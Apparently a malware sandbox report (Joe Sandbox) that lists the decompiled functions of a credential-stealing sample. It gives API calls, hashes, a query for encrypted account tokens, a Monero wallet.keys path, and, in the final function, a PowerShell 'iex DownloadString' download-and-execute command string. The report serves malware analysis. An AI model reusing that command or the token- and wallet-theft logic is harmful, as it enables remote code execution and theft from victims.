                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                • API String ID: 3073930149-1079375795
                                • Opcode ID: 1f917873df8afd23127a20f2b06ce4aef952e3acee34190ec46b2441a749d316
                                • Instruction ID: b2c3325a258eeddad25c9e29a36dce6a1dc265df20d318e88acb9b1179fee875
                                • Opcode Fuzzy Hash: 1f917873df8afd23127a20f2b06ce4aef952e3acee34190ec46b2441a749d316
                                • Instruction Fuzzy Hash: 3AB153729102189BDB18FBA0EC56EEE77B8BF54300F445568F507B3091EF746A49CB62
                                Function 00E26770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess$DefaultLangUser
                                • String ID: *
                                • API String ID: 1494266314-163128923
                                • Opcode ID: 146ce5db9ec14bfd663569a0b1cd31584288843517992e28d03142ce0c781a17
                                • Instruction ID: b20d92096478ec0ecc27a9a3eda3effcd02d1a40e006ca66d6fdc3c0692dfa41
                                • Opcode Fuzzy Hash: 146ce5db9ec14bfd663569a0b1cd31584288843517992e28d03142ce0c781a17
                                • Instruction Fuzzy Hash: 7AF05E30A0431DEFD3649FE0E90972D7F70FB04707F040399E64A97284D67A4B419B95
                                Function 00E14FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E14FCA
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E14FD1
                                • InternetOpenA.WININET(00E30DDF,00000000,00000000,00000000,00000000), ref: 00E14FEA
                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00E15011
                                • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00E15041
                                • InternetCloseHandle.WININET(?), ref: 00E150B9
                                • InternetCloseHandle.WININET(?), ref: 00E150C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                • String ID:
                                • API String ID: 3066467675-0
                                • Opcode ID: a20490bcbd01ef0aa39e5e8f3c46720006d3124c603f4c011f5f2e65f939a312
                                • Instruction ID: 7e94c0e3cb6b6338a426e1a7a2d01f93bbbf3b43834890459baf24f44d0a19c9
                                • Opcode Fuzzy Hash: a20490bcbd01ef0aa39e5e8f3c46720006d3124c603f4c011f5f2e65f939a312
                                • Instruction Fuzzy Hash: 9231F2B5A00218EBDB20CF94DC85BD9B7B4FB48704F1081D9AA0AA7281C7746EC58F98
                                Function 00E283DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00E28426
                                • wsprintfA.USER32 ref: 00E28459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00E2847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00E2848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00E28499
                                  • Part of subcall function 00E2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E2A7E6
                                • RegQueryValueExA.ADVAPI32(00000000,008FDA48,00000000,000F003F,?,00000400), ref: 00E284EC
                                • lstrlen.KERNEL32(?), ref: 00E28501
                                • RegQueryValueExA.ADVAPI32(00000000,008FD850,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00E30B34), ref: 00E28599
                                • RegCloseKey.ADVAPI32(00000000), ref: 00E28608
                                • RegCloseKey.ADVAPI32(00000000), ref: 00E2861A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                • String ID: %s\%s
                                • API String ID: 3896182533-4073750446
                                • Opcode ID: 6a36136ff95271e17d423efbdf2a2843bf2f6150e332f2f69ea6b9d3e2d327f0
                                • Instruction ID: 847b896350f3faa08642773ca9dc206b050dd93e1bfb6bd31b0effa0feaab74c
                                • Opcode Fuzzy Hash: 6a36136ff95271e17d423efbdf2a2843bf2f6150e332f2f69ea6b9d3e2d327f0
                                • Instruction Fuzzy Hash: 9C21F6B1A1022CABDB24DB54DC85FE9B7B8FB48704F048298A649A6140DF756A85CFA4
                                Function 00E27690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E276A4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E276AB
                                • RegOpenKeyExA.ADVAPI32(80000002,008EB738,00000000,00020119,00000000), ref: 00E276DD
                                • RegQueryValueExA.ADVAPI32(00000000,008FD940,00000000,00000000,?,000000FF), ref: 00E276FE
                                • RegCloseKey.ADVAPI32(00000000), ref: 00E27708
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: 9a848d5b0db8737ff6a68d2d336c5c9cd3427b15e72e1c01c65c8276ecd43e6f
                                • Instruction ID: c43b09054b30a8bf91e02375bf6eea79096fbb8aa3457eac5453af07e7d25b4f
                                • Opcode Fuzzy Hash: 9a848d5b0db8737ff6a68d2d336c5c9cd3427b15e72e1c01c65c8276ecd43e6f
                                • Instruction Fuzzy Hash: 1A018FB4B00308FFDB10DBE0EC49FAFBBB8EB48701F004155FA85A7284E6B999008B50
                                Function 00E27720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E27734
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E2773B
                                • RegOpenKeyExA.ADVAPI32(80000002,008EB738,00000000,00020119,00E276B9), ref: 00E2775B
                                • RegQueryValueExA.ADVAPI32(00E276B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00E2777A
                                • RegCloseKey.ADVAPI32(00E276B9), ref: 00E27784
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: 3cc88794bf7189533c650d221694608e4fffd7873f4f231c68b3206198c7cff2
                                • Instruction ID: 2e0c0e73d473cea14a8ca990a942d216a85780530b6527de7718dda0bcf1e4b4
                                • Opcode Fuzzy Hash: 3cc88794bf7189533c650d221694608e4fffd7873f4f231c68b3206198c7cff2
                                • Instruction Fuzzy Hash: 700144B5A40308FFD710DBE4DC49FBFBBB8EB48705F004255FA45A7285DA7559008B50
                                Function 00E292E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(:,80000000,00000003,00000000,00000003,00000080,00000000,?,00E23AEE,?), ref: 00E292FC
                                • GetFileSizeEx.KERNEL32(000000FF,:), ref: 00E29319
                                • CloseHandle.KERNEL32(000000FF), ref: 00E29327
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSize
                                • String ID: :$:
                                • API String ID: 1378416451-4250114551
                                • Opcode ID: 37b56f7e5ec71243065ae85bc89629046c60404ee0829c0a83eec459383ee0b5
                                • Instruction ID: 9ce189b2c2fcc7fc621db6caabf147309f8267c06815627175bd4a3a8b608591
                                • Opcode Fuzzy Hash: 37b56f7e5ec71243065ae85bc89629046c60404ee0829c0a83eec459383ee0b5
                                • Instruction Fuzzy Hash: 1EF03C39F40308FBDB20DBB0EC49B9E77B9AB48710F109254B651A72C4DB7596018B40
                                Function 00E199C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E199EC
                                • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E19A11
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00E19A31
                                • ReadFile.KERNEL32(000000FF,?,00000000,00E1148F,00000000), ref: 00E19A5A
                                • LocalFree.KERNEL32(00E1148F), ref: 00E19A90
                                • CloseHandle.KERNEL32(000000FF), ref: 00E19A9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: a7f15ccfe27d18331298e5c1303853edd63fd9f0326ea96c6d515ab92c16a14c
                                • Instruction ID: 0300e5b56bcadf857452705ba973076f7b6a72a06def5558d6f51715f3bd29e9
                                • Opcode Fuzzy Hash: a7f15ccfe27d18331298e5c1303853edd63fd9f0326ea96c6d515ab92c16a14c
                                • Instruction Fuzzy Hash: C8312BB4A00209EFDB24CF94D895BEE77B5FF48304F108158E902B7280D779A985CFA0
                                Function 00E24780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcat.KERNEL32(?,008FDD30), ref: 00E247DB
                                  • Part of subcall function 00E28DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E28E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00E24801
                                • lstrcat.KERNEL32(?,?), ref: 00E24820
                                • lstrcat.KERNEL32(?,?), ref: 00E24834
                                • lstrcat.KERNEL32(?,008EB338), ref: 00E24847
                                • lstrcat.KERNEL32(?,?), ref: 00E2485B
                                • lstrcat.KERNEL32(?,008FD7B8), ref: 00E2486F
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E28D90: GetFileAttributesA.KERNEL32(00000000,?,00E11B54,?,?,00E3564C,?,?,00E30E1F), ref: 00E28D9F
                                  • Part of subcall function 00E24570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00E24580
                                  • Part of subcall function 00E24570: RtlAllocateHeap.NTDLL(00000000), ref: 00E24587
                                  • Part of subcall function 00E24570: wsprintfA.USER32 ref: 00E245A6
                                  • Part of subcall function 00E24570: FindFirstFileA.KERNEL32(?,?), ref: 00E245BD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                • String ID:
                                • API String ID: 2540262943-0
                                • Opcode ID: ed57a0bec157e419e207760f1af9278fafb206298fefe3850d50826b372a1855
                                • Instruction ID: 4063d7521dd180d3e1dcdcedb2861c1e8ef0963158c27dbd960c95c4c15c9d18
                                • Opcode Fuzzy Hash: ed57a0bec157e419e207760f1af9278fafb206298fefe3850d50826b372a1855
                                • Instruction Fuzzy Hash: 3A3173B2900318A7CB24F7B0EC85EEE73BCBB48700F405599B359A6081EE7597C9CB95
                                Function 00E22C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00E22D85
                                Strings
                                • <, xrefs: 00E22D39
                                • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00E22CC4
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00E22D04
                                • ')", xrefs: 00E22CB3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
